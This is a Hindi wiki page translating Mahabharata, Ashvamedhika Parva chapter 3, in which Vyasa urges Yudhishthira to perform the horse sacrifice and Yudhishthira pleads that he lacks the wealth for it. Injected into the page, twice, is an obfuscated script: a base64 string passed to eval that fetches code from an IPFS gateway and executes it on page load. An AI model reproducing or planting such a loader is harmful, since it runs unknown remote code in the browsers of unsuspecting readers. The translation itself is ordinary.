महाभारत आश्‍वमेधिक पर्व अध्याय 3 श्लोक 1-18

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

तृतीय (3) अध्याय: आश्‍वमेधिक पर्व (अश्वमेध पर्व)

महाभारत: आश्‍वमेधिक पर्व: तृतीय अध्याय: श्लोक 1-18 का हिन्दी अनुवाद

व्यासजी का युधिष्ठर को अश्वमेघ यज्ञ के लिये धन की प्राप्ति का उपाय बताते हुए संवर्त और मरुत का प्रसंग उपस्थित करना

व्यासजी ने कहा- युधिष्ठर! मुझे तो ऐसा जान पड़ता है कि तुम्हारी बुद्धि ठीक नहीं है। कोई भी मनुष्य स्वाधीन होकर अपने-आप कोई काम नहीं करता है। यह मनुष्य अथवा पुरुष समुदाय ईश्वर से प्रेरित होकर ही भले-बुरे काम करता है।[1] अत: इसके लिये शोक करने की क्या आवश्यकता है? भरत नन्दन! यदि तुम अन्ततोगत्वा अपने-आप को ही युद्धरूपी पाप कर्म का प्रधान मानते हो तो वह पाप जिस प्रकार नष्ट हो सकता है, वह उपाय बताता हूँ, सुनो।
युधिष्ठर! जो लोग पाप करते हैं, वे तप, यज्ञ और दान के द्वारा ही सदा अपना उद्धार करते हैं। नरेश्वर! पुरुषसिंह! पापाचारी मनुष्य यज्ञ, दान और तपास्या से ही पवित्र होते हैं। महामना देवता और दैत्य पुण्य के लिये यज्ञ करने का ही प्रयत्न करते हैं, अत: यज्ञ पमर आश्रय है। यज्ञों द्वारा ही महामनस्वी देवताओं का महत्व अधिक हुआ है और यज्ञों से ही क्रियानिष्ठ देवताओं ने दानवों को परास्त किया है। भरतवंशी नरेश युधिष्ठर! तुम राजसूय, अश्वमेध, सर्वधर्म और नरमेध यज्ञ करो। विधिवत् दक्षिणा देकर बहुत से मनोवांछित पदार्थ, अन्न और धन से सम्पन्न अश्वमेध यज्ञ के द्वारा दशरथनन्दन श्री राम की भाँति यजन करो। तथा तुम्हारे पूर्व पितामह महापराक्रमी दुष्यन्त कुमार शकुन्तलानन्दन पृथ्वी पति राजा भरत ने जैसे यज्ञ किया था, उसी प्रकार तुम भी करो। युधिष्ठर ने कहा- विप्रवर! इसमें संदेह नहीं कि अश्वमेध यज्ञ सारी पृथ्वी को भी पवित्र कर सकता है, किन्तु इसके विषय में मेरा अभिप्राय है, उसे आप यहाँ सुन लें।
द्विजश्रेष्ठ! अपने जाति-भाइयों का यह महान् संहार करके अब मुझ में थोड़ा-सा भी दान देने की शक्ति नहीं रह गयी है; क्योंकि मेरे पास धन नहीं है। यहाँ जो राजकुमार उपस्थित हैं, ये सब-के-सब बालक और दीन हैं, महान् संकट में पड़े हुए हैं और इनके शरीर का घाव भी अभी सूखने नहीं पाया है; अत: इन सबसे मैं धन की याचना नहीं कर सकता। द्विजश्रेष्ठ! स्वयं ही सारी पृथ्वी का विनाश कराकर शोकमग्न हुआ मैं इनसे यज्ञ के लिये कर किस तरह वसूल करूँगा। मुनिश्रेष्ठ! दुर्योधन के अपराध से यह पृथ्वी और अधिकांश राजा हम लोगों के माथे अपयश का टीका लगाकर नष्ट हो गये। दुर्योधन ने धन के लोभ से समस्त भूमण्डल का संहार कराय; किन्तु धन मिलना तो दूर रहा, उस दुर्बुद्धि का अपना खजाना भी ख़ाली हो गया। अश्वमेध यज्ञ में समूची पृथ्वी का दक्षिणा देनी चाहिये। यहीं विद्वानों ने मुख्य कल्प माना है। इसके सिवा जो कुछ किया जाता है, वह विधि के विपरीत है। तपोधन! मुख्य वस्तु के अभाव में जो दूसरी कोई वस्तु दी जाती है, वह प्रतिनिधि दक्षिणा कहलाती है; किन्तु प्रतिनिधि दक्षिणा देने की मेरी इच्छा नहीं होती; अत: भगवान! इस विषय में आप मुझे उचित सलाह देने की कृपा करें।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. यह कथन युधिष्ठर को सांत्वना देने के लिये गौणरूप में इस दृष्टि से है कि मरनेवालों की मृत्यु उनके प्रारब्ध कर्मानुसार अवश्यमभावाी थी; अत: जो कुछ हुआ है, ईश्वर प्रेरणा के ही अनुसार हुआ है।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>